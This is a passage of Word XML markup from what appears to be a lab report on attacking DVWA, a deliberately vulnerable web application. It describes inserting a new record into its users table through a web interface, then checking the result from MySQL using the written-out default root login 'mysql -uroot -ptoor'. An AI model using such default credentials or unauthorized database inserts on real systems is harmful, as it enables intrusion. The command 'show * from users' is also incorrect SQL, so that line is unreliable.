    <w:p w14:paraId="01582377" w14:textId="20525DE8" w:rsidR="00380E6B" w:rsidRDefault="00380E6B" w:rsidP="003600D2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BEC303" w14:textId="2AD284FD" w:rsidR="00FB2A02" w:rsidRDefault="00296354" w:rsidP="00FB2A02">
      <w:pPr>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3593"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EB71EF4" wp14:editId="242C8054">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1876425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3479165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="419100" cy="152400"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="450" name="Flowchart: Alternate Process 450"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="419100" cy="152400"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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C4C60" id="Flowchart: Alternate Process 450" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:147.75pt;margin-top:273.95pt;width:33pt;height:1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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2166196E" wp14:editId="52EB9855">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2790825</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2860041</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="790575" cy="152400"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="452" name="Flowchart: Alternate Process 452"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="790575" cy="152400"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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70DA6" id="Flowchart: Alternate Process 452" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:219.75pt;margin-top:225.2pt;width:62.25pt;height:1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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F3697C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59828D90" wp14:editId="3B149985">
            <wp:extent cx="5872163" cy="3859928"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="20"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2 (1).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId35">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5272" r="21051" b="2471"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5886723" cy="3869499"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB8DFAE" w14:textId="201CBAB3" w:rsidR="00F3697C" w:rsidRDefault="00FB2A02" w:rsidP="00FB2A02">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Filling in information to add a new record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344A34F0" w14:textId="65C2BA5F" w:rsidR="00CD4739" w:rsidRPr="00CD4739" w:rsidRDefault="00CD4739" w:rsidP="00CD4739">
      <w:r>
        <w:t xml:space="preserve">After clicking on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4739">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Confirm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003A4980">
        <w:t>we were a</w:t>
      </w:r>
      <w:r w:rsidR="00BA3485">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="003A4980">
        <w:t xml:space="preserve">le to view the SQL statement </w:t>
      </w:r>
      <w:r w:rsidR="009B4C01">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00CA67DF">
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidR="009B4C01">
        <w:t>s going t</w:t>
      </w:r>
      <w:r w:rsidR="00BA3485">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="009B4C01">
        <w:t xml:space="preserve"> be inserte</w:t>
      </w:r>
      <w:r w:rsidR="00BA3485">
        <w:t>d into the database</w:t>
      </w:r>
      <w:r w:rsidR="009B4C01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA3485">
        <w:t xml:space="preserve">and clicked on </w:t>
      </w:r>
      <w:r w:rsidR="00BA3485" w:rsidRPr="00BA3485">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r w:rsidR="00BA3485">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43966371" w14:textId="59BB9C50" w:rsidR="00BA3485" w:rsidRDefault="00296354" w:rsidP="00BA3485">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76C29A45" wp14:editId="775D17CA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1771650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2183765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3914775" cy="190500"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="453" name="Flowchart: Alternate Process 453"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3914775" cy="190500"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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4F837" id="Flowchart: Alternate Process 453" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:139.5pt;margin-top:171.95pt;width:308.25pt;height:1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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AC40165" wp14:editId="5AC9BCBD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1809750</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3079115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="209550" cy="95250"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="455" name="Flowchart: Alternate Process 455"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="209550" cy="95250"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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9D862" id="Flowchart: Alternate Process 455" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:142.5pt;margin-top:242.45pt;width:16.5pt;height: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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FB2A02">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54D18059" wp14:editId="4FB22DC1">
            <wp:extent cx="5855970" cy="3681865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Picture 2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3.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId36">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5321" r="16504" b="1350"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5899419" cy="3709183"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6E1C88" w14:textId="21887477" w:rsidR="00FB2A02" w:rsidRDefault="00BA3485" w:rsidP="00BA3485">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Viewing the S</w:t>
      </w:r>
      <w:r w:rsidR="003C5C77">
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L statement to be inserted and clicking on </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA3485">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699CA36B" w14:textId="248650D0" w:rsidR="003C5C77" w:rsidRDefault="003C5C77" w:rsidP="003C5C77">
      <w:r>
        <w:t xml:space="preserve">After clicking on </w:t>
      </w:r>
      <w:r w:rsidRPr="003C5C77">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="003C5C77">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D4B11">
        <w:t>we were able to view the new record we added</w:t>
      </w:r>
      <w:r w:rsidR="002170B6">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="002170B6" w:rsidRPr="002170B6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00296354">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="002170B6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B5793" w14:textId="49668C81" w:rsidR="00481529" w:rsidRDefault="00296354" w:rsidP="00481529">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E290EE5" wp14:editId="100C15CF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1828800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3140710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3133725" cy="152400"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="456" name="Flowchart: Alternate Process 456"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3133725" cy="152400"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:srgbClr val="FFFF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6FB4C" id="Flowchart: Alternate Process 456" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:2in;margin-top:247.3pt;width:246.75pt;height:1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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007D4B11">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B3F5C05" wp14:editId="36FDD119">
            <wp:extent cx="5843116" cy="3328155"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="22" name="Picture 2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4.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId37">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5260" r="16891" b="10584"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5862584" cy="3339243"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3ECB47" w14:textId="5D9A0661" w:rsidR="007D4B11" w:rsidRPr="003C5C77" w:rsidRDefault="00481529" w:rsidP="00481529">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Viewing all the records in table users including the new record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F18EE6" w14:textId="65213AA5" w:rsidR="0028153C" w:rsidRDefault="0028153C" w:rsidP="00A46319">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc41839637"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Confirming </w:t>
      </w:r>
      <w:r w:rsidR="0027516E">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>Attack on</w:t>
      </w:r>
      <w:r w:rsidR="003948E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D359D3">
        <w:t>DVWA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3DCA4BBB" w14:textId="08BF1D3B" w:rsidR="00862519" w:rsidRPr="00862519" w:rsidRDefault="00E32DAC" w:rsidP="00862519">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BF78354" wp14:editId="4E19A0D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1184275</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1743075" cy="114300"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="474" name="Flowchart: Alternate Process 474"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1743075" cy="114300"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:schemeClr val="accent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C0BBE" id="Flowchart: Alternate Process 474" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:0;margin-top:93.25pt;width:137.25pt;height:9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" filled="f" strokecolor="#c45911 [2405]" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00862519">
        <w:t xml:space="preserve">So we logged into one of the machines of Websters </w:t>
      </w:r>
      <w:r w:rsidR="007E2224">
        <w:t>to access the web server</w:t>
      </w:r>
      <w:r w:rsidR="00D222F7">
        <w:t xml:space="preserve">. We used the </w:t>
      </w:r>
      <w:r w:rsidR="00D222F7" w:rsidRPr="00F12A39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mysql -uroot -ptoor</w:t>
      </w:r>
      <w:r w:rsidR="00F12A39" w:rsidRPr="00F12A39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F12A39">
        <w:t xml:space="preserve">command to log into the MySQL server. Further, we </w:t>
      </w:r>
      <w:r w:rsidR="00D5492F">
        <w:t xml:space="preserve">used the command </w:t>
      </w:r>
      <w:r w:rsidR="00D5492F" w:rsidRPr="00F202FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>show databases;</w:t>
      </w:r>
      <w:r w:rsidR="00D5492F">
        <w:t xml:space="preserve"> to view all the databases</w:t>
      </w:r>
      <w:r w:rsidR="00F202FB">
        <w:t xml:space="preserve"> and then used the command </w:t>
      </w:r>
      <w:r w:rsidR="00F202FB" w:rsidRPr="006C5D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>use dvwa;</w:t>
      </w:r>
      <w:r w:rsidR="00F202FB">
        <w:t xml:space="preserve"> to use the </w:t>
      </w:r>
      <w:r w:rsidR="00F202FB" w:rsidRPr="006C5D05">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:r w:rsidR="00F202FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C5D05">
        <w:t xml:space="preserve">database. Then, </w:t>
      </w:r>
      <w:r w:rsidR="00310674">
        <w:t xml:space="preserve">we use the command </w:t>
      </w:r>
      <w:r w:rsidR="00310674" w:rsidRPr="00E464EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>show tables;</w:t>
      </w:r>
      <w:r w:rsidR="00310674">
        <w:t xml:space="preserve"> to view all the table</w:t>
      </w:r>
      <w:r w:rsidR="00D31D3F">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00310674">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00310674" w:rsidRPr="00E464EE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:r w:rsidR="00D31D3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00310674">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007347E9">
        <w:t xml:space="preserve">and used the command </w:t>
      </w:r>
      <w:r w:rsidR="007347E9" w:rsidRPr="00BC1472">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>show *</w:t>
      </w:r>
      <w:r w:rsidR="00BC1472" w:rsidRPr="00BC1472">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from users;</w:t>
      </w:r>
      <w:r w:rsidR="00BC1472">
        <w:t xml:space="preserve"> to display all the details of all the records in table </w:t>
      </w:r>
      <w:r w:rsidR="00BC1472" w:rsidRPr="00BC1472">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidR="00BC1472">
        <w:t xml:space="preserve">. We were successfully able to view the record we added while performing </w:t>
      </w:r>
      <w:r w:rsidR="0027516E">
        <w:t>the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A3DEA4" w14:textId="71462884" w:rsidR="00323960" w:rsidRDefault="00E32DAC" w:rsidP="00323960">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B8D4033" wp14:editId="3C4AFCA3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>9524</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5046344</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3990975" cy="104775"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="480" name="Flowchart: Alternate Process 480"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3990975" cy="104775"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
